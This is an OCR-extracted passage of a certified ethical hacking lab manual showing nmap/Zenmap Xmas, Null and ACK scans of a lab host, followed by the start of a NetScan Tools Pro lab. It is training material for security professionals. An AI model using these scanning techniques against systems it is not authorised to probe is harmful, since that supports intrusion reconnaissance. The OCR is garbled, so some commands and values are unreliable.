Module 03 - Scanning Networks 22. Click the Scan tab, and select Xmas Tree scan (‫־‬sX) from the TCP scans: drop-down list. 1_T□ ' xProfile Editor !map -T4 -A -v 10.0.0.4 Help Enable all ad/anced/aggressive options Enable OSdetection (-0). version detection (-5V), script scanning (- sCMand traceroute (‫־־‬traceroute). Scan | Ping | Scripting | Target | Source | Other TimingProfile 10.00.4 None FI None ACK scan (-sA) ‫׳‬ FINscan ( sF) Mamon scan (-sM) Null scan (-sN) TCP SYN scan (-5S) TCPconnect >can (‫»־‬T) . Window scan (-sW) | Xmas Treescan (‫־‬sX) Sun optk>m Target? (optional): TCP scam Non-TCP scans: Timing template: □ Version detection (-sV) ‫ח‬ Idle Scan (Zombie) (-si) □ FTP bounceattack (-b) □ Disable reverseDNS resc ‫ם‬ IPv6 support (■6) Cancel 0SaveChanges FIGURE 6.16:The Zenmap ProfileEditorwindowwiththe Scantab 23. Select None in die Non-TCP scans: drop-down list and Aggressive (‫־‬ T4) in the Timing template: list and click Save Changes ‫י‬‫־‬ | ‫ם‬ ^1Profile Friitor nmap •sX •T4 -A ■v 10.0.0.4 Help Enable all ad/anced/aggressive options Enable OSdetection (-0). version detection (-sV), script scanning (- sQ and traceroute(--traceroute). Ping | Scripting [ Target Source | Other | TimingScarProfile Scan option* Target? (optional): 1D.0D.4 TCP scan: Xmas Tlee scan (‫־‬sX) | v | Non-TCP scans: Timing template: None [v‫׳‬ ] Aggressive(-T4) [v | @ E n a b le all a d v a n c e d / a g g r e s s v e o p tio n s ( -A ) □ Operating system detection (•O) O Version detection (-sV) □ Idle Scan (Zombie) (-51) □ FTP bounceattack (-b) O Disable reverseDNS resolution (‫־‬n) ‫ח‬ IPv6 support (-6) Cancel 0SaveChanges FIGURE 6.17:The Zenmap ProfileEditorwindowwiththe Scantab 24. Enter the IP address in die Target: field, select the Xmas scan opdon from the Profile: held and click Scan. UDP scan is activated with the -sU option. It can be combined with a TCP scan type such as SYN scan (‫־‬sS) to check both protocols during the same run. Q Nmap detects rate limiting and slows down accordingly to avoid flooding the networkwith useless packets that the target machine drops. Q You can speed up your UDP scans by scanning more hosts in parallel, doing a quick scan of just the popular ports first, scanning from behind the firewall, and using ‫־־‬ host-timeout to skip slow hosts. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 131
Zenmap Module 03 - Scanning Networks Scan Tools Profile Help Target: 10.0.0.4 |v | Profile- | Xmas Scan | v | |Scan| Cancel | Command: nmap -sX -T4 -A -v 100.0/ ( Hosts || Services | Nmap Output Potts/Hosts | Topology Host Details j Scans 05 < Host A V 1 | Details] Filter Hosts In Nmap, option -sY (SCTPINIT scan) is often referred to as half-open scanning, because you donft open a full SCTP association. You send an INIT chunk, as ifyou were going to open a real association and then wait for a response. FIGURE 6.18:The ZenmapmainwindowwithTarget and Profileentered 25. Nmap scans the target IP address provided and displays results on the Nmap Output tab. i z cZenmap 10.0.0.4 v l Profile. Xmas Scan |Scani| Scan Tools Profile Help Target Command: nmap -sX -T4 -A -v 100.0/ N-nap Output Ports / Hosts | Topology Host Details | Scans nmap -sX -T4 -A -v 10.0.0.4 S ta r t in g Nmap 6 .0 1 ( h ttp ://n m a o .o r g ) a t 2 0 1 2 -0 8 -2 4 N < F ‫ל‬ lo a d e d 9 3 s c r i p t s f o r s c a n n in g . NSE: S c r ip t P re -s c a n n in g . I n i t i a t i n g ARP P in g Scan a t 1 6 :2 9 S ca n n in g 1 0 .0 .0 .4 [1 p o r t] C om pleted ARP P in g Scan a t 1 6 :2 9 , 0 .1 5 s e la p s e d (1 t o t a l h o s ts ) I n i t i a t i n g P a r a lle l DMS r e s o lu t io n o f 1 h o s t, a t 1 6 :2 9 co m p le te d P a r a lle l dns r e s o lu t io n o f l n o s t. a t 1 6 :2 9 , 0 .0 0 s e la p s e d I n i t i a t i n g XMAS Scan a t 1 6:2 9 S c a n rin g 1 0 .0 .6 .4 [1 0 9 0 p o r ts ] In c r e a s in g send d e la y f o r 1 0 .0 .0 .4 fro m 0 t o 5 due t o 34 o u t o f 84 d ro pp ed pro & e s s in c e la s t in c re a s e . Com pleted XMAS Scan a t 1 6 :3 0 , 8 .3 6 s e la p s e d :10 0 0 t o t a l p o r ts ) I n i t i a t i n g S c rv ic e scon ot 16:30 I n i t i a t i n g OS d e te c tio n ( t r y # 1 ) a g a ir s t 1 0 .0 .0 .4 NSE: S c r ip t s c a n n in g 1 0 .0 .0 .4 . I n i t i a t i n g MSE a t 1 6 :3 0 Com pleted NSE a t 1 6 :3 0 , 0 .0 0 s e la p s e d Nnap scon r e p o r t f o r 1 0 .0 .0 .4 H ost i s up (0 .e 0 0 2 0 s la te n c y ) . ServicesHosts OS « Host * 10.0.0.4 £Q! When scanning systems, compliant with this RFC text, any packet not containing SYN, RST, or ACK bits results in a returned RST, if the port is closed, and no response at all, if the port is open. aThe option, -sA (TCP ACK scan) is used to map out firewall rulesets, determiningwhether they are stateful or not and which ports are filtered. FIGURE 6.19: The Zenmap mainwindowwiththeNmap Outputtab 26. Click the Services tab located at the right side of die pane. It displays all die services o f that host. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 132
Module 03 - Scanning Networks 1=0‫־‬Zenmap 10.0.0.4 ^ Profile Xmas Scan ‫'י‬ | | Scan | Scan Iools Profile Help Target: Command: nmap -sX -T4 -A -v 10.0.0.4 Nmap Output Ports / Hosts | Topology | Host Dttails | Scans Detailsnmap -sX T4 -A -v 10.0.0.4 ‫ח‬S ta r t in g Nmap 6 .0 1 ( h ttp ://n m a p .o r g ) a t 2 0 1 2*0 8 -2 4 : Loaded 03 s c r ip t s f o r sca n nin g. NSE: S c r ip t P re -s c a n n in g . I n i t i a t i n g ARP P ir g Scan a t 1 6 :2 9 S c a n rin g 1 0 .0 .0 .4 [1 p o r t ] m C om pleted ARP P in g Scan a t 1 6 :2 9 , 8 .1 5 s e la p s e d (1 t o t a l h o s ts ) I n i t i a t i n g 3a r a l l e l DNS r e s o lu t io n o f 1 h o s t, a t 1 6 :2 9 C om pleted P a r a lle l DNS r e s o lu t io n 0-f 1 n e s t, a t 1 6 :2 9 , 0 .0 0 s e la p s e d I n i t i a t i n g XMAS Scan a t 1 6:2 9 S c a n rin g 1 0 .0 .0 .4 [1 0 0 0 p o r ts ] In c r e a s in g send d e la y f o r 1 0 .0 .0 .4 fro m e t o 5 due t o 34 o u t o f 84 d ‫־׳‬opped p ro o e s s in c e la s t in c re a s e . C om pleted XHAS Scan a t 1 6 :3 0 . 8 .3 6 s e la p s e d (1 0 0 0 t o t a l p o r ts ) I n i t i o t i n g S e rv ic e scan at 16:30 I n i t i a t i n g OS d e te c tio n ( t r y # 1 ) a g a in s t 1 0 .0 .0 .4 NSE: S c r ip t s c a n n in g 1 0 .0 .0 .4 . I n i t i a t i n g USE a t 1 6:30 C om pleted NSE a t 1 6 :3 0 , 0 .0 e s e la p s e d N n a p s c a n r e p o r t f o r 1 0 . 0 . 0 . 4 H ost i s up (0 .0 0 0 2 0 s la t e n c y ) . V Hosts | Services | FIGURE 6.20: Zenmap MainwindowwithServicesTab 27. Null scan works only if the operating system’s TC P/IP implementation is developed according to RFC 793.111 a 111111scan, attackers send a TCP frame to a remote host with NO Flags. 28. To perform a 111111 scan for a target IP address, create a new profile. Click Profile ‫>־‬ New Profile or Command Ctrl+P Zenmap v Scan |Cancel |[ New ProfJeor Command CtrkP | nas Scan 9 £dit SelectedProf<e Qrl+E | Hosts || Scrvncct Nmap Output Portj / Hosts | Topology] Host D e to S c e n t OS « Host w 10.0.0.4 FIGURE 6.21:The Zenmapmainwindowwiththe NewProfileorCommand option S T A S K 3 Null Scan The option Null Scan (‫־‬sN) does not set any bits (TCP flagheader is 0). m The option, -sZ (SCTP COOKIE ECHO scan) is an advance SCTP COOKIE ECHO scan. It takes advantage of the fact that SCTP implementations should silently drop packets containing COOKIE ECHO chunks on open ports but send an ABORT if the port is closed. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 133
Module 03 - Scanning Networks 29. On die Profile tab, input a profile name Null Scan in the Profile name text field. L ^ IProfile Editor n m a p -s X -T 4 - X -v 1 0.0.0.4 Help Profile name This is how the profile v/ill be identfied in the drop-down combo box in the scan tab. Profile Scan | Ping | Scripting | Target| Source | Othc | Timing^ Profile Information Profile name | Null Scanj~~| D e s c r ip tio n a The option, -si <zombie host>[:<probeport>] (idle scan) is an advanced scan method that allows for a truly blind TCP port scan of the target (meaning no packets are sent to the target from your real IP address). Instead, a unique side-channel attack exploits predictable IP fragmentation ID sequence generation on the zombie host to glean information about the open ports on the target. FIGURE 622:The Zenmap Profile EditorwiththeProfiletab 30. Click die Scan tab in the Profile Editor window. Now select the Null Scan (‫־‬sN) option from the TCP scan: drop-down list. Profile Editor nmap -eX -T4 -A -v 10.0.0.4 H e lp Profle name Thisis how the profile will be identified n the drop-down combo box n the scan tab. Cancel Save Changes Profile] Scan | Ping | Scripting| larget | Source Jther Timing Scan options Targets (optional): 1C.0.04 TCP scan: XmasTree scan (-sX) |v Non-TCP scans: None Timing template: ACKscen ( sA) [Vj Enable all advanced/aggressu FN scan (‫־‬sF) □ Operating system detection (‫־‬ Maimon «can (•?M) □ Version detection (■sV) Null scan (•sN) (71 Idle Scan (Zombie) (•si) TCP SYN scan(-sS) O FTP bounce attack (-b) TCP connect scan (‫־‬sT) (71 Disable reverse DNSresolutior Wincow scan (‫־‬sW) 1 1IPy6 support (-6) Xma; Tree !can (-sX) FIGURE 6.23:The ZenmapProfile Editorwiththe Scantab 31. Select None from the Non-TCP scans: drop-down field and select Aggressive (-T4) from the Timing template: drop-down field. 32. Click Save Changes to save the newly created profile. m The option, -b <FTP relay host> (FTP bounce scan) allows a user to connect to one FTP server, and then ask that files be sent to a third-party server. Such a feature is ripe for abuse on many levels, so m ost servers have ceased supporting it. The option, -r (Don't randomize ports): By default, Nmap randomizes the scanned port order (except that certain commonly accessible ports are moved near the beginning for efficiency reasons). This randomization is normally desirable, but you can specify -r for sequential (sorted from lowest to highest) port scanning instead. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 134
Module 03 - Scanning Networks ' - I T - 'Profile Editor |Scan[ Help Disable reverse DNSresolution Neer do reverse DNS. This can slash scanning times. £oncel Erj SaveChange* nmap -sN -sX -74 -A -v 10.0.0.4 P r o file S ca n P in g | S c r ip tin g | T a rg e t | S o ir e e [ C t h c i | T im in g Scan options Targets (opbonal): 10.0.0.4 TCP scan: Nul scan (•sN) V Non-TCP scans: None V Timing template: Aggressive (-T4) V C Operating system detection (-0) [Z Version detection (-5V) I Id le S c a n ( Z o m b ie ) (-si) Q FTP bounce attack (-b) I ! D is a b le re v e rse D N S r e s o lu t io n (-n ) □ IPv6 support (-6) FIGURE 6.24:The ZenmapProfile Editorwiththe Scantab 33. 111 the main window of Zenmap, enter die target IP address to scan, select the Null Scan profile from the Profile drop-down list, and then click Scan. In Nmap, option — version-all (Try every single probe) is an alias for -- version-intensity 9, ensuring that every single probe is attempted against each port. m The option,-‫־‬top- ports <n> scans the <n> highest-ratio ports found in the nmap-services file. <n> must be 1 or greater. Zenmap Null ScanProf1‫:•י‬ Scfln Iools Erofile Help Target | 10.0.0.4 Command: nmap -sN •sX •T4 -A *v 10.00.4 Topology | Host Detais ( ScansPorts / HostsNmap OutpjtServicesHosts < Port < Prctoccl < State < Service < VersionO S < H o s t *U 10.00.4 Filter Hosts Q The option -sR (RPC scan), method works in conjunction with the various port scan methods of Nmap. It takes all the TCP/UDP ports found open and floods them with SunRPC program NULL commands in an attempt to determine whether they are RPC ports, and if so, what program and version number they serve up. FIGURE 6.25:The Zenmap mainwindowwithTarget and Profileentered 34. Nmap scans the target IP address provided and displays results in Nmap Output tab. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 135
Module 03 - Scanning Networks B Q uZenmap Scan Tools Profile Help Scan! Cancelv Profile: Null ScanTarget 10.0.0.4 C o m m a n d : n m a p - s N - T 4 - A - v 10.C.0.4 Details ‫פן‬ Nmap Output | Ports/ Hosts ] Topology [ Host Details | ScansServicesHosts nmap -sN •T4 •A-v 10.0.04 ‫ח‬ OS < Host IM 10.0.0.4 S ta r t in g Mmap 6 .0 1 ( h t t p : / / n 1ra p .o rg ) a t 2012 0 8 24 N S t: Loaded 93 s c r ip t s f o r s c a n n in g . NSE: S c r ip t P re -s c a n n in g . I n i t i a t i n g ARP P in g Scan a t 1 6 :4 7 S ca n n in g 1 0 .6 .0 .4 [1 p o r t] C o n p le te d ARP P in g Scan a t 1 6 :4 7 , 0 .1 4 s e la p s e c (1 t o t a l h o s ts ) I n i t i a t i n g P a r a lle l DNS r e s o lu t io n o f 1 h o s t, a t 1 5:4 7 C o n p le te d P a r a lle l DNS r e s o lu t io n o-F 1 h o s t, a t 1 6 :4 7 , 0 .2 8 s e la p s e ti i n i t i a t i n g n u l l scan a t 1 6 :4 7 S ca n n in g 1 0 .0 .0 .4 [1 0 0 0 p o r ts ] In c r e a s in g send d e la y f o r 1 0 .0 .0 .4 -from 0 to 5 due t o 68 o u t o f 169 d ro pp ed p ro be s s in c e la s t in c re a s e . C o n p le te d NULL Scan a t 1 6 :4 7 , 7 .7 B s e la p s e d (1 0 0 0 t o t a l p o r ts ) I n i t i a t i n g S e rv ic e scan a t 1 6 :4 7 I n i t i a t i n g OS d e te c tio n ( t r y * l ) a g a in s t 1 0 .0 .0 .4 NSE: S c r ip t sc a n n in g 1 0 .0 .0 .4 . I n i t i a t i n g NSE a t 1 6 :4 7 C o n p le te d NSE a t 1 6 :4 7 , 0 .0 0 s e la p s e c Nmap scan r e p o r t f o r 1 0 .0 .0 .4 H o st is up ( 0 . 000068s la te n c y ) . Filter Hosts FIGURE 6.26: The Zenmap mainwindowwith theNmap Outputtab 35. Click the Host Details tab to view the details of hosts, such as Host Status, Addresses. Open Ports, and Closed Ports ‫׳‬ - [ n r x 'Zenmap CancelNull ScanProfile: Scan Tools £rofle Help Target 10.0.0.4 C o m m a n d : n m a p - s N - T 4 • A - v 10.0.0 .4 Nmap Output | Ports/ Hosts | Topology Host Details | ScansSen/icesHosts - 10.0.0.4! ie B Host Status State: up Open ports: 0 ports: 0 Closed ports: 1000 Scanned ports: 1000 Up tirre: Not available Last boot: Not available S Addresses IPv4: 10.0.0.4 IPv6: N o t a v a ila b le MAC: 00:15:5D:00:07:10 • Com m ents OS « Host * 10.0.0.4 Filter Hosts FIGURE 627: ‫׳‬Hie Zenmap mainwindowwiththe Host Detailstab 36. Attackers send an ACK probe packet with a random sequence number. No response means the port is filtered and an RST response means die port is not filtered. The option -version- trace (Trace version scan activity) causes Nmap to pnnt out extensive debugging info about what version scanning is doing. It is a subset of what you get with —packet-trace, T A S K 4 ACK Flag Scan C E H Lab M anual Page 136 Ethical H acking and Counterm easures Copyright © by EC-Coundl All Rights Reserved. Reproduction is Strictly Prohibited
Module 03 - Scanning Networks 37. To perform an ACK Flag Scan for a target IP address, create a new profile. Click Profile ‫>־‬ New Profile or Command Ctrl+P. ! ^ □ T 0 E Zenmap Ctrl+Efj?l Edit Selected Profile Command: !!mop ■v» ■n* ‫**־‬ • v Porte / Hoete Topology | Hod Details JScantNmip Ojtput 4 Po‫׳‬t 4 Protocol 4 S tatt 4 Service < Vtrsicn Services ]Hoete OS < Host IM 10.0.0.4 Filter Hosts m The script: —script- updatedb option updates the script database found in scripts/script.db, which is used by Nmap to determine the available default scripts and categories. It is necessary to update the database only if you have added or removed NSE scripts from the default scripts directory or if you have changed the categories of any script. This option is generally used by itself: nmap — script-updatedb. FIGURE 6.28:The Zenmapmainwindowwiththe NewProfileorCommand option 38. On the Profile tab, input ACK Flag Scan in the Profile name text field. ‫־‬r a nProfile Editor nmap -sN -T4 -A -v 10.0.0.4 Help Description The descrption isafull description of what the scan does, which may be long. £ancel 0 SaveChanges TimingProfile [scan | Ping | Scripting | Target | Soiree[ Cthei | Profile Information Profile name |ACK PagScanj Description FIGURE 6.29:The Zenmap ProfileEditorWindowwiththe Profile tab 39. To select the parameters for an ACK scan, click the Scan tab in die Profile Editor window, select ACK scan (‫־‬sA) from the Non-TCP scans: drop-down list, and select None for all die other fields but leave the Targets: field empty. The options: -min- parallelism <numprobes>; -max-parallelism <numprobes> (Adjust probe parallelization) control the total number of probes that may be outstanding for a host group. They are used for port scanning and host discovery. By default, Nmap calculates an ever- changing ideal parallelism based on network performance. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 137
Module 03 - Scanning Networks ‫׳‬x! - ! □ ‫י‬Profile Editor [ScanJ Help E n a b le a ll a d v a n c e d , a g g re s s iv e o p tio n s Enable OSdetection (-0), version detection (-5V), script scanning (■ sC), and traceroute (‫־־‬ttaceroute). £ancel Q Save Changes n m a p - s A -sW -T 4 - A - v 10.0.0.4 Profile | Scan Ping Scnpting T3rg=t Source Other Timing Scan options Targets (optional): 10004 TCP scan: ACK scan (-sA) |v | Non-TCP scans: None Timing template: ACKscan( sA) [34 Enable all advanced/aggressi FIN scan (-sF) □ Operating system detection (- Maimon scan (-sM) □ Version detection (-5V) Null scan (-sNl O Idle Scan (Zombie) (‫־‬si) TCP SYN scan (-5S) □ FTP bounce attack (‫־‬b) TCP connect scan (-sT) f l Disable reverse DNSresolutior Vbincov scan (-sW) 1 1IPv6support (-6) Xmas Tree scan (-5X) The option: —min-rtt- timeout <time>, —max-rtt- timeout <time>, —initial- rtt-timeout <t1me> (Adjust probe timeouts). Nmap maintains a running timeout value for determining how long it waits for a probe response before giving up or retransmitting the probe. This is calculated based on the response times of previous probes. FIGURE 6.30:The Zenmap ProfileEditorwindowwiththe Scantab 40. Now click the Ping tab and check IPProto probes (-PO) to probe the IP address, and then click Save Changes. Profile Editor [Scan]n m a p - s A -sNJ -T 4 - A - v - P O 1 0 0 .0 .4 Help I C M P ta m « £ ta m p r# q u * :t Send an ICMP timestamp probe to see i targets are up. Profile Scan Ping Scnpting| Target | Source | Other Timing Ping options □ Don't ping before scanning (‫־‬Pn) I I ICMP ping (-PE) Q ICMP timestamp request (-PP) I I ICMP netmask request [-PM) □ ACK ping (-PA) □ SYNping (-PS) Q UDPprobes (-PU) 0 jlPProto prcb«s (-PO)i (J SCTP INIT ping probes (-PY) Cancel Save Changes G The Option: -max- retries <numtries> (Specify the maximum number of port scan probe retransmissions). When Nmap receives no response to a port scan probe, it can mean the port is filtered. Or maybe the probe or response was simplylost on the network. FIGURE 6.31:The Zenmap ProfileEditorwindowwiththe Pmgtab 41. 111 the Zenmap main window, input die IP address of the target machine (in diis Lab: 10.0.0.3), select ACK Flag Scan from Profile: drop-down list, and then click Scan. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 138
Module 03 - Scanning Networks £ 3 The option: -‫־‬host- timeout <time> (Give up on slow target hosts). Some hosts simply take a long time to scan. Tins may be due to poody performing or unreliable networking hardware or software, packet rate limiting, or a restrictive firewall. The slowest few percent of the scanned hosts can eat up a majority of the scan time. 42. Nmap scans die target IP address provided and displays results on Nmap Output tab. The option: —scan- delay <time>; --max-scan- delay <time> (Adjust delay between probes).This option causes Nmap to wait at least the given amount of time between each probe it sends to a given host. This is particularly useful in the case of rate limiting. 43. To view more details regarding the hosts, click die Host Details tab X ‫ן‬ Zenmap r CancelACK Flag ScanProfile: Sc$n Tools £rofle Help Target: 10.0.0.4 Command: nmap -sA -P0 10.0.0.4 ScansHost Details Details Nmap Output j Ports/Hosts[ Topology nmap -sA -PO 10D.0.4 S ta rtin g ^map 6.01 ( h ttp ://n m a p .o rg ) a t 2012-08-24 17:03 In d ia Sta nd a rd T in e Nmap scan re p o rt fo r 1 0 .0 .0 .4 Host i s u9 (0.00000301 la t e n c y ). A ll 1000 scanned ports on 10.0.0.4 are u n filte re d WAC Address: 30:15:50:00:07:10 (M ic ro s o ft) Nmap d on e: 1 IP a dd re ss (1 h o s t u p) sca nn ec in 7 .5 7 seconds Sen/icesHosts OS < Host * 10.0.0.4 Filter Hosts FIGURE 6.33: The Zenmap mainwindowwith theNmap Outputtab ‫ם‬‫־‬Zenmap CancelScan ‫פב‬ACK Flag Scanv Profile: Scan Tools Profile Help Target: 10.0.0.4 Command: nmap -sA -PO 10.0.0.4 Ports/ Hosts I Topology] Host Details Scans JNmap Output Details Hosts Services Filter Hosts FIGURE 6.32:The Zenmap mainwindowwiththe TargetandProfileentered Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 139
Module 03 - Scanning Networks Zenmap Scan Cancel[~v~| Profile: ACK Flag Scan Scan Tools Profile Help Target: 10.0.0.4 Command: nmap -sA-PO !0.0.04 ScansHostDetalsHosts || Services | Nmap Output JPorts / Hosts JTopology 10.0.04;‫־‬ IS 5 Host Status btate Open portc: Filtered ports: Closed ports: Scanned ports: 1000 Uptime: Not available Last boot Not available B Addresses IPv4: 1a0.0.4 IPv6: Not available MAC: 0Q15:50:00:07:10 ♦ Comments OS « Host * 10.0.0.4 Filter Hosts Q The option: —min- rate <number>; —mas-rate <number> (Directly control the scanning rate). Nmap's dynamic timing does a good job of finding an appropriate speed at which to scan. Sometimes, however, you may happen to know an appropriate scanning rate for a network, or you may have to guarantee that a scan finishes by a certain time. FIGURE 6.34:The Zenmap mainwindowwiththe Host Detailstab Lab Analysis Document all die IP addresses, open and closed ports, sendees, and protocols you discovered during die lab. T ool/U tility Inform ation Collected/O bjectives Achieved Types of Scan used: ■ Intense scan ■ Xmas scan ‫י‬ Null scan ■ ACK Flag scan Intense Scan —N m ap O utput ■ ARP Ping Scan - 1 host ■ Parallel DNS resolution of 1 host N m ap ■ SYN Stealth Scan • Discovered open port on 10.0.0.4 o 135/tcp, 139/tcp, 445/tcp, ... ■ MAC Address ■ Operating System Details ■ Uptime Guess ■ Network Distance ■ TCP Sequence Prediction ■ IP ID Sequence Generation ■ Service Info C E H Lab M anual Page 140 Ethical H acking and Counterm easures Copyright © by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited
Module 03 - Scanning Networks Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Analyze and evaluate the results by scanning a target network using; a. Stealth Scan (Half-open Scan) b. nmap -P 2. Perform Inverse TCP Flag Scanning and analyze hosts and services for a target machine in die network. Internet Connection Required □ Yes Platform Supported 0 Classroom 0 No 0 iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 141
Module 03 - Scanning Networks Scanning a Network Using the NetScan Tools Pro iNetScanT001s Pro is an integratedcollection of internetinformationgatheringand netirork troubleshootingutilitiesforNetirork P/vfessionals. Lab Scenario You have already noticed in die previous lab how you can gadier information such as ARP ping scan, MAC address, operating system details, IP ID sequence generation, service info, etc. duough Intense Scan. Xmas Scan. Null Scan and ACK Flag Scan 111 Nmap. An attacker can simply scan a target without sending a single packet to the target from their own IP address; instead, they use a zombie host to perform the scan remotely and if an intrusion detection report is generated, it will display die IP of die zombie host as an attacker. Attackers can easily know how many packets have been sent since die last probe by checking die IP packet fragment identification number (IP ID). As an expert penetration tester, you should be able to determine whether a TCP port is open to send a SYN (session establishment) packet to the port. The target machine will respond widi a SYN ACK (session request acknowledgement) packet if die port is open and RST (reset) if die port is closed and be prepared to block any such attacks 011 the network 111this lab you will learn to scan a network using NetScan Tools Pro. You also need to discover network, gadier information about Internet or local LAN network devices, IP addresses, domains, device ports, and many other network specifics. Lab O bjectives The objective of diis lab is assist to troubleshoot, diagnose, monitor, and discover devices 011 network. 111 diis lab, you need to: ■ Discovers IPv4/IPv6 addresses, hostnames, domain names, email addresses, and URLs ICON KEY ‫־‬23 Valuable information Test your knowledge ‫ס‬ W eb exercise m W orkbook review Detect local ports Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 142
Module 03 - Scanning Networks Lab Environm ent To perform die lab, you need: ■ NetScaii Tools Pro located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksScanning ToolsNetScanTools Pro ■ You can also download the latest version of NetScan Tools Pro from the link http:/ / www.11etscantools.com/nstpromai11.html ■ If you decide to download die latest version, dien screenshots shown in die lab might differ ■ A computer running Windows Server 2012 ■ Administrative privileges to run die NetScan Tools Pro tool Lab Duration Time: 10 Minutes O verview of N etw ork Scanning Network scanning is die process of examining die activity on a network, which can include monitoring data flow as well as monitoring die functioning of network devices. Network scanning serves to promote bodi die security and performance of a network. Network scanning may also be employed from outside a network in order to identify potential network vulnerabilities. NetScan Tool Pro performs the following to network scanning: ■ Monitoring network devices availability ■ Notifies IP address, hostnames, domain names, and port scanning Lab Tasks Install NetScan Tool Pro in your Window Server 2012. Follow die wizard-driven installation steps and install NetScan Tool Pro. 1. Launch the Start menu by hovering die mouse cursor in the lower-left corner of the desktop '1* 4 WindowsSer*f2012 * taataiermXni faemeCvcidilcOetoceitc EMtuaian copy, luld M>: FIGURE /.l: Windows Server2012-Desktopview 2. Click the NetScan Tool Pro app to open the NetScan Tool Pro window S 7Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks S TASK 1 Scanning the Network ^ Active Discovery and Diagnostic Tools that you can use to locate and test devices connected to your network. Active discovery means that we send packets to the devices in order to obtain responses.. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 143
Module 03 - Scanning Networks Administrator A Start Server Manager Windows PowwShel Google Chrome HjperV kWvwcr NetScanT... Pro Demo h m o ‫י‬‫ו‬ f* Q Control Pan*l V Mjrpw-V Mdchir*. e ■»***‫■׳‬1**“'»‫־׳‬ ( onviund I't. n.".‫־‬ wrr © *I x-x-ac n 2‫ז‬20 9 FIGURE 7.2 Windows Server 2012- Apps 3. If you are using the Demo version of NetScan Tools Pro, then click Start the DEMO 4. The Open or Create a New Result Database-NetScanTooIs Pro window will appears; enter a new database name in Database Name (enter new name here) 5. Set a default directory results for database file location, click Continue * ‫ו‬Open or Create a New Results Database - NetScanTools® Pro NetScanToote Pro autom atical saves results n a database. The database «srequred. Create a new Results Database, open a previous Resdts Database, or use this software r Tranng Mode with a temporary Results Database. ■‫״‬Trainrtg Mode Qutdc Start: Press Create Training Mode Database then press Continue. Database Name (enter new name here) A NEW Results Database w l be automabcaly prefixed with MstProOata-' and w i end with ,.db?. No spaces or periods are allowed when enterng a new database name. Results Database File Location Test| Results Database Directory C :^MsersAdministratordocuments Select Another Results Database ‫*״‬Create Trainmg Mode Database Set Default Directory Project Name (opbonal) Analyst Information (opbonal, can be cisplayed r reports if desired) Name Telephone Number Fitie Mobile Number Organization Email Address Exit Program Update Analyst Information ContinueUse Last Results Database FIGURE 7.3: setting a new database name for XetScan Tools Pro 6. The NetScan Tools Pro main window will appears as show in die following figure £L) Database Name be created in the Results Database Directory and it will have NstProData- prefixed and it will have the file extension .db3 i—' USB Version: start the software by locating nstpro.exe on your USB drive ‫־‬ it is normally in the /nstpro directory p Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 144
Module 03 - Scanning Networks _ - n | V - test • NetScanTools* Pro Demo Version Build 8-17-12 based on version 11.19 file Eflit A«es51b!11ty View IP«6 Help Wefccrwto NrtScanToobePiJ [W o Vbtfen 11 TH1 «a<Kw1n>n a d rro ro < k > * •re * T00“i Cut todi hav• niror luiti Th■ duro carrnot be cj>«vt»>0to a U v*dcn H m x x d '•on ■hr A J o i^ e d cr Vtao.a lads cr 10311groined by fm dian on the k ft panel R03 iso- root carract :‫«־‬ ta‫״‬oet. orwn icon :coa I8!en to noucrktniffc. ttu; icon tooo ‫•ו‬® * we• y o j oca sy*em. end groy!con 100b contact ihid party Fleet ' i t FI '«&, to vie‫״‬ e<? a terg h * local help ircLidng Gerttirg Suited >randtiai Automated tools M3nu3l tool: 13III fw orne tools *LCrre Dttcover/tools Pass‫״‬re 0‫י‬ scow1y ro ols Otis 0015‫ז‬ P3«et le v * tools tx tm u l tools prootam into FIGURE 7.4: Main window of NetScan Tools Pro 7. Select Manual Tools (all) on the left panel and click ARP Ping. A window will appears few information about die ARP Ping Tool. 8. Click OK ‫ז‬-‫•°־היד‬ Klrt'iianTooltS Pio 'J test NetScanToois® Pro Demo Version Build 8 17 12 based o r version 11.19 File fdit A<<f11bil1ly Virw IPv6 MHp About the A R P Ping Tool • use this to o l to "PiMti‘ an IPv4 address on yo u r subnet usino a r p paefcrts. •se !r on your LAN to find the 1a4>: ' a tkne o ' a device to an ARP_REQl)EST jacket evai if ‫«יכ‬ d&r ce s hidden and does not respond to ‫־׳‬egu a Png. • A R P P in a require*,‫ג‬ ta rg e t IP v 4 addresson your LAN. • D o n 't m iss th is sp ec ia l fe a tu r e in th is to o l: Identify duplicate IPv4 address b y ‘sin gin g‘ a sse cfic IPv4 address. If more th2 - Gne device (tw o or rrore MAC addresses} responds, you are sh ow n the m a c address of eech of th e deuces. • D o n 't f o r g e t to r!ght d k * in th e results for a m enu with more options. Dem o I im itations • None. Automata!! Tool Manual Tool( Ml im ARP Scan (MAC Ua i jCa«h« F m n itd ♦ C0*n «t» 0rt Monrt. Pjv<mKc Tooll A111vc Dhccnrcry To‫׳‬ Piss 